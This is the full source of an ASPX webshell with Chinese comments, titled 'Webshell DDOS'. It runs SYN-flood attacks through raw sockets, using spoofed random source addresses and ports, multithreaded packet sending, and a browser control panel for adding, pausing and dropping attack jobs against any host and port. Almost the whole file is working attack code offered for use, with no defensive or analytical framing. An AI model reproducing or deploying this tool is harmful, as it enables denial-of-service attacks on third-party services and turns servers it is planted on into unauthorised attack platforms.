Webshell DDOS [aspx版]

<%@ Page Language="C#" AutoEventWireup="true" ValidateRequest="false"%> <%@ Import Namespace="System" %> <%@ Import Namespace="System.Net" %> <%@ Import Namespace="System.Net.Sockets" %> <%@ Import Namespace="System.Threading" %> <%@ Import Namespace="System.Runtime.InteropServices" %> <SCRIPT runat="server"> static ArrayList jobScheduler = new ArrayList();//JOB Scheduler //控制攻击类 public class DDosAttack { public string targetHost = ""; public ushort targetPort = 0; public int attackThread = 0; Thread[] thread = null; public string errMsg = ""; public int state = 0;//0进行 1暂停 2停止 public void run() { thread = new Thread[attackThread]; syn ddos = new syn(targetHost, targetPort); try { for (int i = 0; i < attackThread; i++) { ddos.father = this; thread[i] = new Thread(new ThreadStart(ddos.synFlood)); thread[i].Start(); } } catch(Exception e) { errMsg = e.Message; } } } public struct ipHeader { public byte ip_verlen; //4位首部长度+4位IP版本号 public byte ip_tos; //8位服务类型TOS public ushort ip_totallength; //16位数据包总长度（字节） public ushort ip_id; //16位标识 public ushort ip_offset; //3位标志位 public byte ip_ttl; //8位生存时间 TTL public byte ip_protocol; //8位协议(TCP, UDP, ICMP, Etc.) public ushort ip_checksum; //16位IP首部校验和 public uint ip_srcaddr; //32位源IP地址 public uint ip_destaddr; //32位目的IP地址 } public struct psdHeader { public uint saddr; //源地址 public uint daddr; //目的地址 public byte mbz; public byte ptcl; //协议类型 public ushort tcpl; //TCP长度 } public struct tcpHeader { public ushort th_sport; //16位源端口 public ushort th_dport; //16位目的端口 public int th_seq; //32位序列号 public uint th_ack; //32位确认号 public byte th_lenres; //4位首部长度/6位保留字 public byte th_flag; //6位标志位 public ushort th_win; //16位窗口大小 public ushort th_sum; //16位校验和 public ushort th_urp; //16位紧急数据偏移量 } //这3个是ip首部tcp伪首部tcp首部的定义。 public class syn { private uint ip; private ushort port; private EndPoint ep; private Socket sock; private ipHeader iph; private psdHeader psh; private tcpHeader tch; public DDosAttack father; public Random rand; public UInt16 checksum(UInt16[] buffer, int size) { Int32 cksum = 0; int counter; counter = 0; while (size > 0) { UInt16 val = buffer[counter]; cksum += Convert.ToInt32(buffer[counter]); counter += 1; size -= 1; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >> 16); return (UInt16)(~cksum); } //SYN攻击类 public syn(string _ip, ushort _port) { IPHostEntry ih = Dns.GetHostByName(_ip); ip = Convert.ToUInt32(ih.AddressList[0].Address); IPEndPoint _ep = new IPEndPoint(ih.AddressList[0], _port); port = _port; ep = _ep; ipHeader iph = new ipHeader(); psh = new psdHeader(); tch = new tcpHeader(); sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP); sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1); rand = new Random(); } //循环发送数据 public void synFlood() { //iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint)); iph.ip_verlen = (byte)(4 << 4 | Marshal.SizeOf(iph) / Marshal.SizeOf(ip)); //ipv4，20字节ip头，这个固定就是69 iph.ip_tos = 0; //这个0就行了 iph.ip_totallength = 0x2800; //这个是ip头+tcp头总长，40是最小长度，不带tcp option，应该是0028但是还是网络字节序所以倒过来成了2800 iph.ip_id = 0x9B18; //这个我是拦截ie发送。直接添上来了 iph.ip_offset = 0x40; //这个也是拦截ie的 iph.ip_ttl = 64; //也是拦截ie的，也可以是128什么的。 iph.ip_protocol = 6; //6就是tcp协议 iph.ip_checksum = UInt16.Parse("0"); //没计算之前都写0 iph.ip_destaddr = ip; //ip头的目标地址就是要攻击的地址，上面传过来的。 psh.daddr = iph.ip_destaddr; //伪tcp首部用于校验的，上面是目的地址，和ip的那个一样。 psh.mbz = 0; //这个据说0就行 psh.ptcl = 6; //6是tcp协议 psh.tcpl = 0x1400; //tcp首部的大小，20字节，应该是0014，还是字节序原因成了1400 tch.th_dport = port; //攻击端口号，上面传过来的 tch.th_ack = 0; //第一次发送所以没有服务器返回的序列号，为0 //tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0)); tch.th_lenres = (byte)((Marshal.SizeOf(iph) / 4 << 4 | 0)); //tcp长度 tch.th_flag = 2; //2就是syn tch.th_win = ushort.Parse("16614"); //拦截ie的 tch.th_sum = UInt16.Parse("0"); //没计算之前都为0 tch.th_urp = UInt16.Parse("0"); //这个连ip都是0，新的攻击方法有改这个值的 while (true) { while (father.state == 1) { Thread.Sleep(5000); } if (father.state == 2) { break; } string srcAddress = rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255);//随机伪IP iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(srcAddress).Address); psh.saddr = iph.ip_srcaddr; ushort sourcePort = Convert.ToUInt16(rand.Next(1, 65535)); byte[] bt = BitConverter.GetBytes(sourcePort); Array.Reverse(bt); tch.th_sport = BitConverter.ToUInt16(bt, 0); tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646)); //上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序 iph.ip_checksum = 0; tch.th_sum = 0; //因为循环中，所以每次必须把这2个已有数的清0才可计算 //byte[] psh_buf = new byte[sizeof(psdHeader)]; byte[] psh_buf = new byte[Marshal.SizeOf(psh)]; Int32 index = 0; //index = pshto(psh, psh_buf, sizeof(psdHeader)); index = pshto(psh, psh_buf, Marshal.SizeOf(psh)); if (index == -1) { father.errMsg="构造tcp伪首部错误"; return; } index = 0; //byte[] tch_buf = new byte[sizeof(tcpHeader)]; byte[] tch_buf = new byte[Marshal.SizeOf(tch)]; //index = tchto(tch, tch_buf, sizeof(tcpHeader)); index = tchto(tch, tch_buf, Marshal.SizeOf(tch)); if (index == -1) { father.errMsg="构造tcp首部错误"; return; } index = 0; //byte[] tcphe = new byte[sizeof(psdHeader) + sizeof(tcpHeader)]; byte[] tcphe = new byte[Marshal.SizeOf(psh) + Marshal.SizeOf(tch)]; Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length); index += psh_buf.Length; Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length); index += tch_buf.Length; tch.th_sum = chec(tcphe, index); index = 0; //index = tchto(tch, tch_buf, sizeof(tcpHeader)); index = tchto(tch, tch_buf, Marshal.SizeOf(tch)); if (index == -1) { father.errMsg="构造tcp首部错误"; return; } index = 0; //byte[] ip_buf = new byte[sizeof(ipHeader)]; byte[] ip_buf = new byte[Marshal.SizeOf(iph)]; //index = ipto(iph, ip_buf,sizeof(ipHeader)); index = ipto(iph, ip_buf, Marshal.SizeOf(iph)); if (index == -1) { father.errMsg="构造ip首部错误"; return; } index = 0; //byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)]; byte[] iptcp = new byte[Marshal.SizeOf(iph) + Marshal.SizeOf(tch)]; Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length); index += ip_buf.Length; Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length); index += tch_buf.Length; iph.ip_checksum = chec(iptcp, index); index = 0; //index = ipto(iph, ip_buf, sizeof(tcpHeader)); index = ipto(iph, ip_buf, Marshal.SizeOf(tch)); if (index == -1) { father.errMsg="构造ip首部错误"; return; } index = 0; Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length); index += ip_buf.Length; Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length); index += tch_buf.Length; //if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader))) if (iptcp.Length != (Marshal.SizeOf(iph) + Marshal.SizeOf(tch))) { father.errMsg="构造iptcp报文错误"; return; } try { //socket.sendto把构造好的数据发送出去 sock.SendTo(iptcp, ep); } catch { father.errMsg="发送错误"; return; } } } public UInt16 chec(byte[] buffer, int size) { Double double_length = Convert.ToDouble(size); Double dtemp = Math.Ceiling(double_length / 2); int cksum_buffer_length = Convert.ToInt32(dtemp); UInt16[] cksum_buffer = new UInt16[cksum_buffer_length]; int icmp_header_buffer_index = 0; for (int i = 0; i < cksum_buffer_length; i++) { cksum_buffer[i] = BitConverter.ToUInt16(buffer, icmp_header_buffer_index); icmp_header_buffer_index += 2; } UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length); return u_cksum; } //这个是计算校验，把那些类型不一样的全转为16位字节数组用的 public Int32 ipto(ipHeader iph, byte[] Buffer, int size) { Int32 rtn = 0; int index = 0; byte[] b_verlen = new byte[1]; b_verlen[0] = iph.ip_verlen; byte[] b_tos = new byte[1]; b_tos[0] = iph.ip_tos; byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength); byte[] b_id = BitConverter.GetBytes(iph.ip_id); byte[] b_offset = BitConverter.GetBytes(iph.ip_offset); byte[] b_ttl = new byte[1]; b_ttl[0] = iph.ip_ttl; byte[] b_protol = new byte[1]; b_protol[0] = iph.ip_protocol; byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum); byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr); byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr); Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length); index += b_verlen.Length; Array.Copy(b_tos, 0, Buffer, index, b_tos.Length); index += b_tos.Length; Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length); index += b_totallen.Length; Array.Copy(b_id, 0, Buffer, index, b_id.Length); index += b_id.Length; Array.Copy(b_offset, 0, Buffer, index, b_offset.Length); index += b_offset.Length; Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length); index += b_ttl.Length; Array.Copy(b_protol, 0, Buffer, index, b_protol.Length); index += b_protol.Length; Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length); index += b_checksum.Length; Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length); index += b_srcaddr.Length; Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length); index += b_destaddr.Length; if (index != size/* sizeof(IcmpPacket) */) { rtn = -1; return rtn; } rtn = index; return rtn; } //这个是把ip部分转为字节数组用的 public Int32 pshto(psdHeader psh, byte[] buffer, int size) { Int32 rtn; int index = 0; byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr); byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr); byte[] b_psh_mbz = new byte[1]; b_psh_mbz[0] = psh.mbz; byte[] b_psh_ptcl = new byte[1]; b_psh_ptcl[0] = psh.ptcl; byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl); Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length); index += b_psh_saddr.Length; Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length); index += b_psh_daddr.Length; Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length); index += b_psh_mbz.Length; Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length); index += b_psh_ptcl.Length; Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length); index += b_psh_tcpl.Length; if (index != size) { rtn = -1; return rtn; } else { rtn = index; return rtn; } } //这个是把tcp伪首部转为字节数组用的 public Int32 tchto(tcpHeader tch, byte[] buffer, int size) { Int32 rtn; int index = 0; byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport); byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport); byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq); byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack); byte[] b_tch_lenres = new byte[1]; b_tch_lenres[0] = tch.th_lenres; byte[] b_tch_flag = new byte[1]; b_tch_flag[0] = tch.th_flag; byte[] b_tch_win = BitConverter.GetBytes(tch.th_win); byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum); byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp); Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length); index += b_tch_sport.Length; Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length); index += b_tch_dport.Length; Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length); index += b_tch_seq.Length; Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length); index += b_tch_ack.Length; Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length); index += b_tch_lenres.Length; Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length); index += b_tch_flag.Length; Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length); index += b_tch_win.Length; Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length); index += b_tch_sum.Length; Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length); index += b_tch_urp.Length; if (index != size) { rtn = -1; return rtn; } else { rtn = index; return rtn; } } //这个是把tcp部分转为字节数组用的，因为这个要用到2次就不把这个和伪首部放一块了。 } </SCRIPT> <% string action = Request.QueryString["Action"]; if (action != null && !"".Equals(action)) { if ("AddToAttack".Equals(action)) { string host = Request.QueryString["host"];//取得主机名字 string port = Request.QueryString["port"];//取得开始port string thread = Request.QueryString["thread"];//取得线程 DDosAttack da = new DDosAttack(); da.targetHost = host; da.targetPort = Convert.ToUInt16(port); da.attackThread = Convert.ToInt32(thread); da.run(); jobScheduler.Add(da); da = null; } else if("del".Equals(action)) { string id = Request.QueryString["id"]; if(id!=null) { int num = Convert.ToInt32(id); DDosAttack da = (DDosAttack)jobScheduler[num]; if (da!=null) { da.state = 2;//停止了线程 jobScheduler.RemoveAt(num); } da = null; } } else if ("Pause".Equals(action)) { string id = Request.QueryString["id"]; if(id!=null) { int num=Convert.ToInt32(id); DDosAttack da = (DDosAttack)jobScheduler[num]; if(da!=null){da.state=1;} da=null; } } else if("Continue".Equals(action)) { string id = Request.QueryString["id"]; if(id!=null) { int num=Convert.ToInt32(id); DDosAttack da = (DDosAttack)jobScheduler[num]; if (da != null) { da.state = 0; } da=null; } } else { //显示作业调度池 Response.Write("<TABLE><TR><TD>JOB</TD><TD>THREAD</TD><TD>STATE</TD><TD>HOST</TD><TD>PORT</TD><TD>ERR MSG</TD><TD>ACTION</TD></TR>"); int count = jobScheduler.Count; for (int i = 0; i < count;i++ ) { jobScheduler.TrimToSize(); DDosAttack da = (DDosAttack)jobScheduler[i]; string dstate = ""; string operate = ""; if(da!=null) { switch (da.state) { case 0: dstate = "running"; operate = "<input type=button value=Pause onclick=\"ThreadOperate('Pause'," + i + ")\">"; break; case 1: dstate = "pause"; operate = "<input type=button value=Continue onclick=\"ThreadOperate('Continue'," + i + ")\">"; break; } } Response.Write("<TR><TD>" + i + "</TD><TD>" + da.attackThread + "</TD>"); Response.Write("<TD>" + dstate + "</TD><TD>" + da.targetHost + "</TD><TD>" + da.targetPort + "</TD>"); Response.Write("<TD>" + da.errMsg + "</TD><TD><input type=button value=Drop onclick='DropThread(" + i + ");'>" + operate + "</TD></TR>"); da = null; } Response.Write("</TABLE>"); } GC.Collect(); Response.End(); return; } %> <html xmlns:v="urn:schemas-microsoft-com:vml"> <head><title>ISTO aspx-puppet-mummy</title> <style type="text/css"> v\:*{behavior:url(#default#VML);position:absolute;} body,td{font-size: 12px;} body,td{font-size:12px;} table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');} input,select{font-size:12px;color:#000000;} input{border-color:"#000000";color:#008800;background-color:#333333;} body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;} td{white-space:nowrap;} a{color:black;text-decoration:none; color:#008800;} </style> <script language="javascript"> //common String.prototype.trim = function() { return this.replace(/(^\s*)|(\s*$)/g, ""); } String.prototype.ltrim = function() { return this.replace(/(^\s*)/g, ""); } String.prototype.rtrim = function() { return this.replace(/(\s*$)/g, ""); } function createXmlHttpRequest(){//create AJAX CONSOLES if(window.ActiveXObject){ xmlHttp=new ActiveXObject("Msxml2.XMLHTTP"); }else if(window.XMLHttpRequst){ xmlHttp=new XMLHttpRequst(); } } //ref需要信息的组件 function getTheMessage(ref){ if(xmlHttp.readyState==4){ if(xmlHttp.status==200){ var replaceStr; replaceStr=xmlHttp.responseText; replaceStr=replaceStr.trim(); if(replaceStr!=""&&ref){ ref.innerHTML=replaceStr; } return replaceStr; }else{ return ""; } }else{ return ""; } } //str:connection HTTP URL //code:eval the code function openUrlXmlHttpRequstEval(str,code){ url=str; createXmlHttpRequest(); xmlHttp.open("get",url,true); xmlHttp.onreadystatechange=function tmp(){eval(code);}; xmlHttp.send(); } //str:connection HTTP URL //ref:replace the HTML consoles function openUrlXmlHttpRequstReplace(str,ref){ url=str; createXmlHttpRequest(); xmlHttp.open("get",url,true); xmlHttp.onreadystatechange=function tmp(){getTheMessage(ref);}; xmlHttp.send(); } </script> <script language="javascript"> //user define functions //add to scan function post(){ if(S.host.value!=""){ if(parseInt(S.port.value)<=65535){ if(!isNaN(S.port.value)&&parseInt(S.port.value)>0){ var url="?Action=AddToAttack&host="+S.host.value+"&thread="+S.thread.value+"&port="+S.port.value+"&"+Math.random(); openUrlXmlHttpRequstEval(url,"");S.port.value="";S.host.value=""; alert("add success"); }else{ alert("set port error"); } }else{ alert("set port error"); } }else{ alert("HOST can't empty"); } } //view pool function viewSchedulerPool(){ openUrlXmlHttpRequstReplace("?Action="+Math.random(),document.all.pool); } //drop the scanning Thread function DropThread(num){ if(confirm('Are U sure?')){ var url="?Action=del&id="+num+"&"+Math.random(); openUrlXmlHttpRequstEval(url,""); } } function ThreadOperate(ope,id){ if(confirm('Are U sure?')){ var url="?Action="+ope+"&id="+id+"&"+Math.random(); openUrlXmlHttpRequstEval(url,""); } } setInterval("viewSchedulerPool()",3000); </script> </head> <body text="#00ff00" vLink="#008000" aLink="#008000" link="#008000" bgColor="#000000" style="background: no-repeat center center;"> <center> Scheduler Pool: <div id="pool"></div> <hr /> <form method="POST" name='S'> HOST:<input type="text" name="host" /> D-PORT:<input type="text" name="port" size="4" maxlength="5" /> THREAD:<select name="thread"><option value="1">1</option><option value="3">3</option><option value="5">5</option><option value="10">10</option><option value="20">20</option><option value="30">30</option><option value="50">50</option></select> <input type="button" value="Add To Attack" name="Action" onClick="post();" /> </form> </center> <v:Textbox id="istoFullname" style='FONT-SIZE:30;Z-INDEX:3201;FILTER:alpha(opacity=100,style=2) blur(add=0,direction=14,strength=5) wave(add=1,freq=,lightstrength=5,phase=5,strength=2) glow(color=#d9f281,strength=3) ;LEFT:10%;COLOR:#f17a35;FONT-FAMILY:@黑体;TOP:35%' inset='5pt,5pt,5pt,5pt'></v:Textbox> </body> </html></body></html>